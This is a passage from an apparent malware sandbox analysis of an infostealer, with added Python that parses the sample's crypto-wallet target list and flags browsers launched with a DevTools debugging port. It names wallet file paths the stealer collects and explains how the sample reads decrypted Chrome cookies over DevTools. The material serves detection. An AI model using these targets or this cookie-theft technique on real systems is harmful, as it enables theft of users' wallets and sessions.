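    r"Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|"
    r"Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|"
)

# Sandbox user's folders, as they appear in the report's "File opened" lines.
APPDATA = "C:\\Users\\user\\AppData\\Roaming"
USERPROFILE = "C:\\Users\\user"

# ROOT_NOTE: code 1 entries were opened under AppData\Roaming in the report
# (e.g. ...\Roaming\Bitcoin\wallets\), so 1 = %APPDATA%. Code 2 is used only
# for \.chia\..., which Chia keeps under the profile root, so 2 is taken to
# be %USERPROFILE%; that is an assumption, the report opens no code-2 path.
ROOT_CODES = {1: "APPDATA", 2: "USERPROFILE"}


@dataclass(frozen=True)
class WalletTarget:
    name: str      # label the stealer uses for the loot folder
    root: int      # root code, see ROOT_CODES
    rel_dir: str   # directory below the root, with leading and trailing '\'
    mask: str      # exact file name or wildcard mask to collect
    flag: int      # trailing 0/1; its meaning is not stated in the report


def parse_wallet_config(blob: str) -> List[WalletTarget]:
    """Split the pipe-delimited blob into fixed five-field records."""
    fields = blob.split("|")
    if fields and fields[-1] == "":
        fields.pop()  # the blob ends with a delimiter
    if len(fields) % 5:
        raise ValueError(f"{len(fields)} fields is not a multiple of 5")
    return [
        WalletTarget(name, int(root), rel_dir, mask, int(flag))
        for name, root, rel_dir, mask, flag in
        (fields[i:i + 5] for i in range(0, len(fields), 5))
    ]


def resolve_dir(t: WalletTarget, appdata: str = APPDATA,
                userprofile: str = USERPROFILE) -> str:
    """Directory the stealer would enumerate for this entry."""
    roots = {1: appdata, 2: userprofile}
    if t.root not in roots:
        raise ValueError(f"unknown root code {t.root} in entry {t.name!r}")
    return roots[t.root].rstrip("\\") + t.rel_dir


def matches_target(t: WalletTarget, filename: str) -> bool:
    """Case-insensitive wildcard test of a file name against the entry's mask."""
    return fnmatchcase(filename.lower(), t.mask.lower())


def attribute_opened_dirs(opened: Iterable[str], targets: Iterable[WalletTarget],
                          appdata: str = APPDATA,
                          userprofile: str = USERPROFILE) -> Dict[str, List[str]]:
    """Map directories seen in 'File opened' events back to config entries."""
    by_dir: Dict[str, List[str]] = {}
    for t in targets:
        by_dir.setdefault(resolve_dir(t, appdata, userprofile).lower(), []).append(t.name)
    return {p: by_dir.get(p.lower(), []) for p in opened}


if __name__ == "__main__":
    targets = parse_wallet_config(WALLET_CONFIG_EXCERPT)
    for t in targets:
        print(f"{t.name:45} {resolve_dir(t)}{t.mask}")
    # Two directory opens taken from the report's behaviour list.
    observed = [APPDATA + "\\Bitcoin\\wallets\\", APPDATA + "\\Ledger Live\\"]
    print(attribute_opened_dirs(observed, targets))
```

Running the parser over the full string from the report and feeding the resolved directories to a file-access audit (Sysmon Event ID 11 or an EDR file-open rule) gives a watch list that covers every wallet this build targets, rather than the handful the sandbox user happened to have installed.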

Remote Access Functionality

Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
Source: Yara match File source: 00000000.00000002.2466300957.00000000006F1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2467001379.0000000000F7E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.2074987962.0000000004B50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: h4ZgewNxoj.exe PID: 3376, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: Process Memory Space: h4ZgewNxoj.exe PID: 3376, type: MEMORYSTR
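The process creation above, chrome.exe started by the sample with --remote-debugging-port=9229, is the mechanism behind the "Attempt to bypass Chrome Application-Bound Encryption" signature: the parent drives the browser over the DevTools protocol and reads cookies that Chrome has already decrypted, so it never has to defeat the app-bound key itself. A browser launched with a DevTools port by anything other than a developer tool is therefore worth an alert on its own. The detector below is an added example, not code from the sample or the sandbox; its input records are constructed in the shape of Sysmon Event ID 1 fields (Image, CommandLine, ParentImage), with only the first command line and parent taken from the report, and the developer-tool allowlist is an assumption to be tuned per environment.

```python
"""Flag browser launches that expose the Chrome DevTools remote-debugging
interface, the pattern the report recorded for PID 3376 starting chrome.exe.

Added example written for this report; not code from the sample or from the
sandbox. The event records below are constructed in the shape of Sysmon
Event ID 1 fields; only the first command line is taken from the report.
"""
from __future__ import annotations

import re
from dataclasses import dataclass
from typing import Iterable, List, Optional

BROWSERS = {"chrome.exe", "msedge.exe", "brave.exe", "vivaldi.exe", "opera.exe"}
# Parents that legitimately drive a browser over DevTools (IDEs, WebDriver,
# test runners). Assumption: this list is a starting point to tune per estate.
DEV_TOOL_PARENTS = {"code.exe", "node.exe", "chromedriver.exe", "msedgedriver.exe"}

# Matches --remote-debugging-port, --remote-debugging-port=NNNN and
# --remote-debugging-pipe; the port number is captured when present.
DEBUG_FLAG = re.compile(r"--remote-debugging-(?:port(?:=(\d+))?|pipe)\b", re.I)
# Parent binaries running from user-writable locations raise the severity.
USER_WRITABLE = re.compile(r"\\users\\[^\\]+\\(?:desktop|downloads|appdata|public)\\", re.I)

# Constructed records. Event 0 reproduces the parent, child and command line
# the report lists under "Remote Access Functionality"; the rest are benign
# and borderline cases made up to exercise the classifier.
SAMPLE_EVENTS = [
    {"Image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "CommandLine": r'"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""',
     "ParentImage": r"C:\Users\user\Desktop\h4ZgewNxoj.exe"},
    {"Image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "CommandLine": r'"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --user-data-dir=C:\Users\dev\.vscode-chrome',
     "ParentImage": r"C:\Users\dev\AppData\Local\Programs\Microsoft VS Code\Code.exe"},
    {"Image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "CommandLine": r'"C:\Program Files\Google\Chrome\Application\chrome.exe" --profile-directory=Default',
     "ParentImage": r"C:\Windows\explorer.exe"},
    {"Image": r"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe",
     "CommandLine": r'"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --headless --remote-debugging-pipe',
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
]


@dataclass(frozen=True)
class Finding:
    event_index: int
    parent: str
    port: Optional[int]   # None for --remote-debugging-pipe or a bare flag
    severity: str
    reason: str


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path (forward slashes tolerated)."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(event: dict, index: int = 0) -> Optional[Finding]:
    """Return a Finding if the event is a browser launched with DevTools exposed."""
    if basename(event["Image"]) not in BROWSERS:
        return None
    m = DEBUG_FLAG.search(event["CommandLine"])
    if not m:
        return None
    parent_path = event["ParentImage"]
    parent = basename(parent_path)
    if parent in BROWSERS:
        return None  # browser re-spawning itself; assumed benign here
    port = int(m.group(1)) if m.group(1) else None
    if parent in DEV_TOOL_PARENTS:
        severity, reason = "low", "DevTools enabled by a known developer tool"
    elif USER_WRITABLE.search(parent_path):
        severity, reason = "high", "DevTools enabled by a binary running from a user-writable path"
    else:
        severity, reason = "medium", "DevTools enabled by a non-browser, non-developer process"
    return Finding(index, parent_path, port, severity, reason)


def detect(events: Iterable[dict]) -> List[Finding]:
    """Run classify over a stream of process-creation events."""
    return [f for f in (classify(e, i) for i, e in enumerate(events)) if f]


if __name__ == "__main__":
    for f in detect(SAMPLE_EVENTS):
        print(f"[{f.severity}] event {f.event_index}: {f.parent} port={f.port} ({f.reason})")
```

The same logic translates directly into a Sigma or EDR rule: Image ends with a browser name, CommandLine contains "--remote-debugging-", ParentImage is not the browser and not on the developer-tool list. The empty --profile-directory="" in the report's command line is a secondary indicator; legitimate tooling normally names a profile or supplies --user-data-dir.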